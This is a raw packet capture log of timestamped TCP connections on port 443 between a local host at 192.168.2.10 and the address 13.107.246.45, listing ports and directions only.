Nov 8, 2024 16:16:03.703003883 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.703283072 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.703371048 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.703371048 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.703489065 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.703507900 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.706056118 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.706068039 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.706124067 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.706258059 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.706270933 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.734281063 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.734312057 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.734359980 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.734365940 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.734399080 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.734632015 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.734643936 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.734657049 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.734663963 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.737687111 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.737719059 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.737771034 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.737910986 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.737921953 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.129144907 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.129826069 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.129848003 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.130315065 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.130321026 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.299911976 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.300110102 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.300163984 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.302855015 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.302855015 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.302875996 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.302885056 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.310635090 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.310683012 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.310740948 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.310877085 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.310890913 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.414117098 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.414612055 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.414632082 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.415080070 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.415086031 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.427550077 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.428128958 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.428154945 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.428539991 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.428544998 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.435797930 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.436126947 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.436145067 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.436476946 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.436482906 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.470350027 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.470875978 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.470900059 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.471304893 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.471309900 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.544214010 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.544298887 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.544374943 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.556488991 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.556529999 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.556579113 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.556601048 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.556638956 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.567426920 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.567488909 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.567548990 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.593028069 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.593059063 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.593074083 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.593085051 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.600506067 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.600780010 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.600831032 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.600832939 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.600872040 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.654254913 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.654285908 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.654298067 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.654304028 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.662549019 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.662570000 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.662580967 CET	62010	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.662596941 CET	443	62010	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.670809984 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.670835972 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.670870066 CET	62011	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.670874119 CET	443	62011	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.719038963 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.719099998 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.719191074 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.727495909 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.727549076 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.727622032 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.731245995 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.731268883 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.735411882 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.735421896 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.739546061 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.739573956 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.739649057 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.743107080 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.743118048 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.751008987 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.751024961 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:04.751085997 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.758476019 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:04.758487940 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.050765991 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.051254988 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.051295996 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.051734924 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.051744938 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.181787014 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.181863070 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.181920052 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.182110071 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.182125092 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.182166100 CET	62012	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.182172060 CET	443	62012	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.185117006 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.185134888 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.185228109 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.185395956 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.185408115 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.460844994 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.461415052 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.461442947 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.461884975 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.461890936 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.465929031 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.466249943 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.466259003 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.466603994 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.466608047 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.525913954 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.526798010 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.526837111 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.527338982 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.527347088 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.588119984 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.588170052 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.588213921 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.588227987 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.588268995 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.592201948 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.592240095 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.592256069 CET	62015	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.592263937 CET	443	62015	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.596347094 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.596394062 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.596462965 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.596651077 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.596667051 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.603451967 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.603523970 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.603568077 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.603682995 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.603704929 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.603720903 CET	62013	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.603729010 CET	443	62013	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.607446909 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.607480049 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.607568026 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.607696056 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.607707024 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.656794071 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.656881094 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.656927109 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.659751892 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.659753084 CET	62016	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.659787893 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.659801960 CET	443	62016	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.673022985 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.673057079 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.673109055 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.673352957 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.673366070 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.844913960 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.845683098 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.845707893 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.846292019 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.846302032 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.918369055 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.918893099 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.918932915 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.919343948 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.919349909 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.985680103 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.985749006 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.985824108 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.986054897 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.986071110 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.986083031 CET	62014	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.986088037 CET	443	62014	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.989227057 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.989274979 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:05.989362001 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.989523888 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:05.989536047 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.050645113 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.051434040 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.051486015 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.051492929 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.051544905 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.051589012 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.051609993 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.051623106 CET	62017	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.051630020 CET	443	62017	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.054295063 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.054342031 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.054421902 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.054580927 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.054594040 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.339668036 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.340254068 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.340277910 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.340729952 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.340734959 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.398561954 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.399104118 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.399148941 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.399581909 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.399589062 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.404148102 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.404532909 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.404566050 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.404942989 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.404949903 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.472141027 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.472178936 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.472234964 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.472264051 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.472301960 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.472520113 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.472541094 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.472553015 CET	62019	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.472558975 CET	443	62019	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.475568056 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.475616932 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.475696087 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.475883961 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.475907087 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.534037113 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.534101009 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.534173012 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.534393072 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.534414053 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.534426928 CET	62020	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.534432888 CET	443	62020	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.536894083 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.536948919 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.537154913 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.537302017 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.537319899 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.537729025 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.537806988 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.537878036 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.537930965 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.537950993 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.537967920 CET	62018	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.537972927 CET	443	62018	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.540481091 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.540534019 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.540663004 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.540796995 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.540813923 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.729866028 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.730484962 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.730509996 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.730962038 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.730967045 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.777937889 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.778831005 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.778860092 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.779267073 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.779273987 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.860575914 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.860918045 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.861207008 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.861365080 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.861380100 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.861390114 CET	62021	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.861396074 CET	443	62021	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.864291906 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.864343882 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.864423037 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.864598036 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.864612103 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.905210018 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.905320883 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.905539989 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.905579090 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.905579090 CET	62022	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.905601025 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.905613899 CET	443	62022	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.908581018 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.908618927 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:06.908689976 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.908857107 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:06.908881903 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.219985008 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.224642038 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.224674940 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.225106001 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.225119114 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.282646894 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.330084085 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.352948904 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.352986097 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.353038073 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.353102922 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.353193045 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.391345024 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.391393900 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.396001101 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.396030903 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.416255951 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.416282892 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.416296959 CET	62023	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.416304111 CET	443	62023	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.499207973 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.499253988 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.499365091 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.516289949 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.516310930 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.523761988 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.523803949 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.523865938 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.523883104 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.523921013 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.524193048 CET	62025	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.524218082 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.524233103 CET	62025	443	192.168.2.10	13.107.246.45
